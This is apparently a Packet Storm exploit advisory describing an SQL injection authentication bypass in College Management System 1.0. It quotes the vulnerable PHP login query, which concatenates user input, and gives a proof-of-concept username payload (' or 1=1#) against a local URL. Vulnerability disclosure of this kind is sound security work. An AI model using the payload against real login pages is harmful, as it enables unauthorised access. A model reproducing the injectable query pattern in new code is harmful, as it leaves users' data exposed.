College Management System version 1.0 suffers from a remote SQL injection vulnerability that allows for authentication bypass.
6ecb70ef2a809ebc7897afdde2d67ae1b81bda174212d7a23ffd6e67dc2520be# Exploit Title: college management system - SQL Injection Authentication Bypass
# Date: 01/10/2021
# Exploit Author: Abdulrahman https://twitter.com/infosec_90
# Vendor Homepage: https://www.eedunext.com/
# Software Link: https://code-projects.org/college-management-system-in-php-with-source-code/
# Version: 1.0
# Tested on: Kali Linux
in login/login.php in line 8 :
$username=$_POST["email"];
$password=$_POST["password"];
$query="select * from login where user_id='$username' and Password='$password' ";
$result=mysqli_query($con,$query);
POC :
http://127.0.0.1/2/College-Management-System/login/login.php
username : ' or 1=1#
password : 123456
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed